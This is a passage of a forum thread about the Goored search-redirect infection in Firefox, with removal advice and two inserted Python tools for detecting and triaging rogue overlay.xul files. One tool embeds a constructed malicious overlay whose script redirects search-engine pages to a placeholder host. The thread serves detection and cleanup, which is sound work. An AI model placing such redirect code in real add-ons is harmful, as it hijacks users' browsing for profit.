    insertafter="devToolsSeparator"/>
</menupopup>

</overlay>
Definitely weird that we haven't heard more about this. Given the number of NS users, you'd think somebody would notice...
According to Firefoxer, it's a variant of a year-old issue.

@ Firefoxer:
How is this normally acquired or spread; where does it usually live, and *what does it do*? We know it tries to run a script from innoshot, but what does that script do?

I too thought that Montagar had run MBAM already, with no results.
CF wrote:...just make sure you label it in such a fashion that nobody doubts it's malware (i.e. "Innoshots malware.zip" would be great), so nobody stumbles into it and gets infected by mistake. Also, make sure you change the link protocol so nobody accidentally clicks it, pre-loads....
I wasn't thinking of posting it as a downloadable package. I got the impression from Monty's post above that all of the smoking-gun information was in overlay.xul, which is why I suggested that it be copied/pasted here in text form with code tags. If I got the wrong impression, I'm sorry -- then another solution would have to be found. But this way, we can examine it *without opening or running it*. Including any .js files, which also can be copied as text in code tags.
Montagar wrote:I have looked at the code and done some research and it appears that this code belongs to a valid FF add-on (it's listed at addons.mozilla.org).

I know for a fact that I have never installed this particular add-on (well at least not knowingly), and it was never listed in my extensions or plugins list.
We still need to square that with Guardian's opinion, definitely.
Montagar wrote:So before I post the code, I am going to do some research like comparing the "valid" add-on with the "rogue" add-on.

I hope you all understand that I don't want to open the door for accusations and such without doing some prudent research first.
I can understand that. But I'm certainly willing to be PM'd with any info.

Easy search tip: If this thing *always* is packaged in overlay.xul, then just search the machine for all files named that, not for "innoshot". Or even *.xul. I have only a few of those.
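The search tip above runs into the problem Montagar hit earlier in the thread: Windows XP Search skips the contents of .xul files, so a name-based or extension-filtered search can miss the file that actually carries the redirect list. The following is an added example, not code from this thread, that reads every file under a directory (a Firefox profile, say) and reports the ones containing the indicator strings the thread mentions, then shows the same scan restricted to .xul/.js. The profile tree it builds is constructed for the example: the extension ids, the chrome://rogue/ package and the innoshot.example hostname are placeholders, not identifiers from the original posts.

```python
"""Content search for Goored-style indicators in a Firefox profile tree.

Added example, not code from this thread. Windows XP Search skips the contents of
.xul files, so this walks every file under a directory and reads it, reporting the
files that contain any of the indicator strings. The profile layout written by
build_sample_profile() is constructed for this example: the extension ids, file
names and the innoshot.example hostname are placeholders, not real identifiers.
"""
import os
import tempfile

# Search-engine hostnames the thread says appear in the rogue overlay.xul, plus the
# name of the site the blocked script came from.
DEFAULT_INDICATORS = ("google.com", "yahoo.com", "ask.com", "bing.com", "innoshot")

# We are hunting small XUL/JS files; skip anything bigger than this (cache, sqlite).
MAX_BYTES = 2 * 1024 * 1024


def scan_tree(root, indicators=DEFAULT_INDICATORS, extensions=None):
    """Return sorted [(path relative to root, [indicators found])].

    extensions: optional tuple of suffixes such as (".xul", ".js") to restrict the
    scan; None reads every file, so a renamed or oddly named file cannot hide.
    """
    wanted = [s.lower().encode() for s in indicators]
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if extensions and not name.lower().endswith(tuple(extensions)):
                continue
            path = os.path.join(dirpath, name)
            try:
                if os.path.getsize(path) > MAX_BYTES:
                    continue
                with open(path, "rb") as fh:        # bytes: no decode errors on binaries
                    data = fh.read().lower()
            except OSError:
                continue                             # locked/unreadable: skip, keep scanning
            found = [s.decode() for s in wanted if s in data]
            if found:
                hits.append((os.path.relpath(path, root).replace(os.sep, "/"), found))
    return sorted(hits)


def _write(path, text):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(text)


def build_sample_profile(root):
    """Write a constructed profile: one clean extension, one rogue one, a bookmark file."""
    ext = os.path.join(root, "extensions")
    rogue = os.path.join(ext, "{deadbeef-0000-0000-0000-000000000000}", "chrome", "content")
    clean = os.path.join(ext, "{clean-addon}", "chrome", "content")
    xul_open = ('<?xml version="1.0"?>\n'
                '<overlay xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">\n')
    # Rogue overlay: pulls in a script and carries the search-engine list inline.
    _write(os.path.join(rogue, "overlay.xul"), xul_open +
           '<script type="application/x-javascript" src="chrome://rogue/content/redir.js"/>\n'
           '<script type="application/x-javascript">'
           'var targets = ["google.com", "yahoo.com", "ask.com"];</script>\n'
           '</overlay>\n')
    _write(os.path.join(rogue, "redir.js"),
           'var feed = "http://innoshot.example/feed";\n')   # constructed URL, not real
    _write(os.path.join(clean, "overlay.xul"), xul_open + '</overlay>\n')
    # A harmless file that also matches: the scan produces leads, not verdicts.
    _write(os.path.join(root, "bookmarks.html"),
           '<a href="http://www.google.com/">Google</a>\n')


def demo():
    """Build the sample tree in a temp dir and scan it: all files, then .xul/.js only."""
    root = tempfile.mkdtemp(prefix="ffprofile-")
    build_sample_profile(root)
    return scan_tree(root), scan_tree(root, extensions=(".xul", ".js"))


if __name__ == "__main__":
    for path, found in demo()[0]:
        print(path, found)
```

Reading files as bytes and lower-casing them is deliberate: the indicator list is short and literal, so a raw substring match is enough and never chokes on binary files; a hit on bookmarks.html is expected and is why the result is a list to read, not a delete list.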
Post by Tom T. »

Saw CF's latest post after posting my rather lengthy one above.
Look in your msconfig list of startup items and you will see two that are randomly named (long names, lots of characters).
Not here, as we're pretty sure mine was dumped by SB. But I think that checking the Registry "run" keys, and using Autoruns, is even more thorough. Which I believe Monty did -- not sure if he ever gave a full report on Autoruns.
btw, make sure your .NET Framework addon is disabled/uninstalled and the Windows Presentation Foundation plugin is disabled -
I've *never* installed .NET on this machine -- thought it was a bad idea when it first came out :ugeek: and never had Win Infestation, either.
Post by computerfreaker »

The quote nesting is getting a little crazy, and I have a lot of fresh info, so I'm starting fresh. :)

@Tom, I partly understood what you were saying about updating addons with Sandboxie running - thanks for the clarification.

Well, I'm about ready to get on a stump and summarize what I've learned from half-an-hour or so of searching for "Goored" and "Goored malware"... here we go. Note: I'm enclosing this in a quote block, but none of it is actually quoted - it's summarized from what I learned.
Both of you picked up a variant of the Goored (short for Google Redirect) infection. The typical Goored infection redirects the browser from search engine sites to adware/scumware sites - the redirected search sites include Google.com, Ask.com, Bing.com, etc. (Sound familiar, Montagar? Your page list is remarkably similar to this...)

Goored doesn't seem to try to steal any personal info, wreck any files, etc. - just redirect pages and sometimes change the HOSTS file. This is probably some black-hat hacker trying to earn extra money through some affiliate program by bringing extra traffic to certain sites.

It frequently infects Internet Explorer as well; removal doesn't seem to be too difficult, but some people have persistent trouble with it.
Goored (Firefox) lives (as Monty found) in a folder containing overlay.xul and some JavaScript files; the actual folder location seems to vary, depending on the infection variant. Goored (IE) lives in C:\Windows and C:\Windows\system32, where it installs several DLLs.
It's apparently possible to get re-infected after rebooting the computer; to prevent that, leave the Goored infection folder in place but remove the JavaScript files and overlay.xul. Then create a new, blank overlay.xul file using Notepad or another text editor (make sure extensions are shown in Windows Explorer, or you could end up with a file called "overlay.xul.txt", which is useless for stopping Goored) and place it in the location formerly occupied by the malicious overlay.xul file.

Goored seems to bypass most antivirus apps, including MalwareBytes AntiMalware on occasion. (More than just on occasion, as a LOT of people were saying they ran MBAM but it came up empty)
However, there is a tool just for removing Goored; its guide (including a download link) is located at http://forums.majorgeeks.com/showthread.php?t=182559
HTH!
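The summary above describes what the Firefox variant looks like on disk (an overlay.xul plus JavaScript) and what it does (redirects the search-engine hosts). As an added example that is not code from this thread or from any real extension, the following triages an overlay.xul statically: it parses the document, lists the scripts it loads, and flags an overlay whose inline script rewrites the location of those hosts. ROGUE_OVERLAY is a constructed stand-in for the kind of file the thread describes (chrome://example-rogue/ and innoshot.example are placeholders); JAVACONSOLE_OVERLAY is the legitimate overlay Tom T. pasted earlier, included to show that a real add-on also loads an external script and therefore gets a "read the .js too" verdict, not a malware one. For the "blank overlay.xul" neutralisation step, the example assumes a well-formed empty overlay rather than a zero-byte file, since the former parses cleanly and still loads nothing.

```python
"""Static triage of a XUL overlay for Goored-style search redirection.

Added example, not code from this thread or from any real extension. It parses an
overlay.xul with the standard-library XML parser, lists the scripts the overlay
loads, and flags an overlay whose inline script rewrites the location of the
search-engine hosts the thread names. ROGUE_OVERLAY and BLANK_OVERLAY are
constructed for this example; chrome://example-rogue/ and innoshot.example are
placeholders. JAVACONSOLE_OVERLAY is the overlay pasted earlier in the thread.
"""
import re
import xml.etree.ElementTree as ET

XUL_NS = "http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"
SEARCH_ENGINES = ("google.com", "yahoo.com", "ask.com", "bing.com")
PREDEFINED_ENTITIES = {"amp", "lt", "gt", "quot", "apos"}

# A well-formed overlay that loads nothing: the "blank overlay.xul" the thread
# recommends dropping in place of the malicious one (assumption: a zero-byte file
# would only fail to parse, so this inert form is used here instead).
BLANK_OVERLAY = '<?xml version="1.0"?>\n<overlay xmlns="%s"/>\n' % XUL_NS

# Constructed stand-in for a redirecting overlay; not a real sample.
ROGUE_OVERLAY = '''<?xml version="1.0"?>
<overlay xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
  <script type="application/x-javascript" src="chrome://example-rogue/content/redir.js"/>
  <script type="application/x-javascript"><![CDATA[
    var hosts = ["www.google.com", "search.yahoo.com", "www.ask.com"];
    var feed = "http://innoshot.example/?q=";
    function onLoad() {
      var doc = window.content.document;
      for (var i = 0; i < hosts.length; i++)
        if (doc.location.host == hosts[i]) doc.location.href = feed + doc.location.search;
    }
    window.addEventListener("DOMContentLoaded", onLoad, false);
  ]]></script>
</overlay>
'''

# The legitimate Java Console overlay posted earlier in the thread.
JAVACONSOLE_OVERLAY = '''<?xml version="1.0"?>
<!DOCTYPE overlay SYSTEM "chrome://javaconsole1.x.x_x/locale/ffjcext.dtd">
<overlay xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<script type="application/x-javascript" src="chrome://javaconsole1.x.x_x/content/ffjcext.js"/>
<menupopup id="menu_ToolsPopup">
  <menuitem id="javaconsole1.x.x.x" label="&javaConsoleCmd.label;"
            accesskey="&javaConsoleCmd.accesskey;" insertafter="devToolsSeparator"/>
</menupopup>
</overlay>
'''


def _sanitise(xml_text):
    """Drop the DOCTYPE and neutralise DTD entity references so the overlay parses
    without the locale .dtd it points at (we are reading it, not loading it)."""
    text = re.sub(r"<!DOCTYPE[^>]*>", "", xml_text)
    return re.sub(r"&([A-Za-z_][\w.\-]*);",
                  lambda m: m.group(0) if m.group(1) in PREDEFINED_ENTITIES
                  else "[%s]" % m.group(1), text)


def analyze_overlay(xml_text):
    """Return {'external': [src...], 'inline_scripts': n, 'engines': [...],
    'redirects': bool, 'verdict': str} for one overlay document."""
    root = ET.fromstring(_sanitise(xml_text))
    if root.tag != "{%s}overlay" % XUL_NS:
        raise ValueError("not a XUL overlay: %s" % root.tag)
    external, inline = [], []
    for script in root.iter("{%s}script" % XUL_NS):
        if script.get("src"):
            external.append(script.get("src"))
        if script.text and script.text.strip():
            inline.append(script.text)
    blob = "\n".join(inline).lower()
    engines = [e for e in SEARCH_ENGINES if e in blob]
    redirects = "location.href" in blob or "location.replace" in blob
    if not external and not inline:
        verdict = "empty"
    elif engines and redirects:
        verdict = "search-redirect"
    elif engines or inline:
        verdict = "review"                    # inline code present: read it by hand
    else:
        verdict = "loads-external-script"     # only src= scripts: read those .js files
    return {"external": external, "inline_scripts": len(inline), "engines": engines,
            "redirects": redirects, "verdict": verdict}


if __name__ == "__main__":
    for name, doc in (("rogue", ROGUE_OVERLAY), ("blank", BLANK_OVERLAY),
                      ("javaconsole", JAVACONSOLE_OVERLAY)):
        print(name, analyze_overlay(doc))
```

The DOCTYPE and entity handling matters in practice: a real overlay usually pulls its labels from a locale .dtd via entities like &javaConsoleCmd.label;, and a plain XML parser aborts on them unless they are neutralised first. The verdict only covers what is visible in the overlay itself; an overlay that loads chrome://.../redir.js is exactly the case where the referenced .js has to be read as well.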
Post by computerfreaker »

Tom T. wrote:Saw CF's latest post after posting my rather lengthy one above.
Look in your msconfig list of startup items and you will see two that are randomly named (long names, lots of characters).
Not here, as we're pretty sure mine was dumped by SB. But I think that checking the Registry "run" keys, and using Autoruns, is even more thorough. Which I believe Monty did -- not sure if he ever gave a full report on Autoruns.
btw, make sure your .NET Framework addon is disabled/uninstalled and the Windows Presentation Foundation plugin is disabled -
I've *never* installed .NET on this machine -- thought it was a bad idea when it first came out :ugeek: and never had Win Infestation, either.
Good. Hope Monty's OK as well...